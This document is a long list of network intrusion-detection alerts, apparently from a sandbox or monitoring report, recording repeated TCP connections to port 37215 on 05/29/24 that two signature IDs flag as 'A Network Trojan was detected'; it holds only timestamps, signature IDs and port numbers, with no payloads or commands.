                Timestamp:05/29/24-15:16:02.140813
                SID:2829579
                Source Port:51398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664587
                SID:2829579
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503665
                SID:2829579
                Source Port:55134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813293
                SID:2829579
                Source Port:42208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427057
                SID:2835222
                Source Port:33166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947248
                SID:2829579
                Source Port:41470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961904
                SID:2829579
                Source Port:55978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.025317
                SID:2829579
                Source Port:59866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209695
                SID:2835222
                Source Port:50180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984745
                SID:2835222
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657654
                SID:2829579
                Source Port:51590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987163
                SID:2835222
                Source Port:42276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336480
                SID:2835222
                Source Port:35616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545184
                SID:2835222
                Source Port:47106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823322
                SID:2835222
                Source Port:45778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220831
                SID:2829579
                Source Port:35102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570123
                SID:2829579
                Source Port:34722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711249
                SID:2829579
                Source Port:60746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990828
                SID:2829579
                Source Port:43790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170017
                SID:2829579
                Source Port:49718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913045
                SID:2829579
                Source Port:46706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616253
                SID:2829579
                Source Port:41872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228138
                SID:2829579
                Source Port:55774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335837
                SID:2835222
                Source Port:53328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613914
                SID:2835222
                Source Port:44022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575499
                SID:2835222
                Source Port:40164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617516
                SID:2829579
                Source Port:36010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874876
                SID:2835222
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266552
                SID:2829579
                Source Port:39992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856062
                SID:2829579
                Source Port:55322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871633
                SID:2829579
                Source Port:51150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441082
                SID:2829579
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997287
                SID:2835222
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807216
                SID:2835222
                Source Port:48750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725385
                SID:2835222
                Source Port:60724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374385
                SID:2829579
                Source Port:47806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265006
                SID:2835222
                Source Port:40964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335983
                SID:2829579
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617438
                SID:2835222
                Source Port:52878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860705
                SID:2829579
                Source Port:39656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897184
                SID:2829579
                Source Port:38978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563531
                SID:2835222
                Source Port:53974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651669
                SID:2829579
                Source Port:37890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023579
                SID:2829579
                Source Port:50240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779672
                SID:2835222
                Source Port:50898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068094
                SID:2829579
                Source Port:59260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947766
                SID:2829579
                Source Port:44710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655157
                SID:2835222
                Source Port:46594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518056
                SID:2829579
                Source Port:51044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325696
                SID:2829579
                Source Port:56508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572346
                SID:2829579
                Source Port:58864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502094
                SID:2835222
                Source Port:48290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422498
                SID:2835222
                Source Port:48824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665565
                SID:2835222
                Source Port:50300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685135
                SID:2835222
                Source Port:35626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864830
                SID:2829579
                Source Port:38962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431173
                SID:2835222
                Source Port:46972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007523
                SID:2829579
                Source Port:40292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.437241
                SID:2829579
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726374
                SID:2835222
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886279
                SID:2835222
                Source Port:33774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288340
                SID:2829579
                Source Port:53926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432640
                SID:2829579
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845314
                SID:2835222
                Source Port:51156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972660
                SID:2829579
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931069
                SID:2829579
                Source Port:37854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422533
                SID:2835222
                Source Port:53942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655675
                SID:2835222
                Source Port:57414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878598
                SID:2829579
                Source Port:60274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688038
                SID:2835222
                Source Port:34462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559189
                SID:2835222
                Source Port:49268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843430
                SID:2835222
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659838
                SID:2829579
                Source Port:56854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276786
                SID:2829579
                Source Port:41654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782983
                SID:2835222
                Source Port:47644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458064
                SID:2829579
                Source Port:32962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614246
                SID:2829579
                Source Port:59004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499125
                SID:2829579
                Source Port:47972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.861391
                SID:2829579
                Source Port:33110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083159
                SID:2835222
                Source Port:42454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762924
                SID:2829579
                Source Port:59846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717021
                SID:2829579
                Source Port:46060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900089
                SID:2835222
                Source Port:53516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002252
                SID:2835222
                Source Port:59870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449773
                SID:2829579
                Source Port:60710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209375
                SID:2835222
                Source Port:53718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334622
                SID:2835222
                Source Port:35460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557696
                SID:2829579
                Source Port:50160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270285
                SID:2829579
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290464
                SID:2835222
                Source Port:44852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776779
                SID:2829579
                Source Port:52880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362671
                SID:2829579
                Source Port:41342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287828
                SID:2829579
                Source Port:41764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369366
                SID:2829579
                Source Port:48552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613103
                SID:2835222
                Source Port:33020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520632
                SID:2835222
                Source Port:52246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716186
                SID:2829579
                Source Port:42102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950044
                SID:2835222
                Source Port:44266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.044688
                SID:2829579
                Source Port:46928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872817
                SID:2829579
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071668
                SID:2829579
                Source Port:42814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462942
                SID:2829579
                Source Port:33864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023899
                SID:2835222
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910981
                SID:2835222
                Source Port:33462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653964
                SID:2829579
                Source Port:55278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076122
                SID:2829579
                Source Port:57980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943550
                SID:2829579
                Source Port:36258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918378
                SID:2835222
                Source Port:49964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950347
                SID:2835222
                Source Port:55240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575513
                SID:2835222
                Source Port:35928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392551
                SID:2835222
                Source Port:53744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556987
                SID:2829579
                Source Port:42032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557007
                SID:2835222
                Source Port:56902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730356
                SID:2835222
                Source Port:41648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292689
                SID:2835222
                Source Port:40702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620851
                SID:2829579
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165822
                SID:2835222
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655935
                SID:2835222
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.940979
                SID:2829579
                Source Port:41142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083474
                SID:2829579
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421955
                SID:2829579
                Source Port:59886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418857
                SID:2835222
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652553
                SID:2835222
                Source Port:56394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470189
                SID:2835222
                Source Port:52408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576071
                SID:2829579
                Source Port:41032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965317
                SID:2829579
                Source Port:38540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945256
                SID:2829579
                Source Port:42840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419910
                SID:2835222
                Source Port:46680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961970
                SID:2835222
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444247
                SID:2829579
                Source Port:44768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900623
                SID:2829579
                Source Port:33326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766861
                SID:2835222
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277431
                SID:2835222
                Source Port:38138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435306
                SID:2829579
                Source Port:41910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848808
                SID:2829579
                Source Port:36984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899206
                SID:2835222
                Source Port:55242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434426
                SID:2835222
                Source Port:57700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858833
                SID:2835222
                Source Port:59404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844110
                SID:2835222
                Source Port:51670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583766
                SID:2835222
                Source Port:43236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177147
                SID:2829579
                Source Port:45952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857020
                SID:2835222
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574528
                SID:2829579
                Source Port:41238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883798
                SID:2829579
                Source Port:49156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915460
                SID:2829579
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962405
                SID:2829579
                Source Port:39954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728665
                SID:2835222
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015899
                SID:2829579
                Source Port:33662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845360
                SID:2829579
                Source Port:57196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670707
                SID:2829579
                Source Port:56340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100871
                SID:2835222
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652900
                SID:2835222
                Source Port:49520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800352
                SID:2835222
                Source Port:34206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292614
                SID:2835222
                Source Port:40246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738437
                SID:2829579
                Source Port:42758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883086
                SID:2829579
                Source Port:58648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557564
                SID:2829579
                Source Port:34568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810605
                SID:2835222
                Source Port:41738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932166
                SID:2829579
                Source Port:37716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586380
                SID:2835222
                Source Port:37202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900400
                SID:2835222
                Source Port:38640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716044
                SID:2835222
                Source Port:37376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283293
                SID:2835222
                Source Port:54814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316084
                SID:2835222
                Source Port:34024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335029
                SID:2835222
                Source Port:42428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916045
                SID:2835222
                Source Port:33986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421807
                SID:2829579
                Source Port:45198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654397
                SID:2835222
                Source Port:48188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947271
                SID:2835222
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074716
                SID:2835222
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669444
                SID:2835222
                Source Port:38680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734765
                SID:2829579
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809278
                SID:2835222
                Source Port:51468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945589
                SID:2835222
                Source Port:38264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786281
                SID:2829579
                Source Port:56390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815019
                SID:2835222
                Source Port:53464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630474
                SID:2835222
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.072591
                SID:2829579
                Source Port:33134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653004
                SID:2829579
                Source Port:44198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172916
                SID:2829579
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263387
                SID:2829579
                Source Port:46062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338858
                SID:2835222
                Source Port:50794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815642
                SID:2835222
                Source Port:33264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418341
                SID:2835222
                Source Port:56014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282562
                SID:2829579
                Source Port:56854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891247
                SID:2835222
                Source Port:40584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233600
                SID:2835222
                Source Port:46716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928403
                SID:2835222
                Source Port:39096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464806
                SID:2835222
                Source Port:51914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074800
                SID:2829579
                Source Port:46612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173263
                SID:2829579
                Source Port:42556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336418
                SID:2835222
                Source Port:59638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358650
                SID:2835222
                Source Port:42546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421729
                SID:2829579
                Source Port:52688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796958
                SID:2835222
                Source Port:51140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853344
                SID:2835222
                Source Port:41776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840212
                SID:2835222
                Source Port:35922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881774
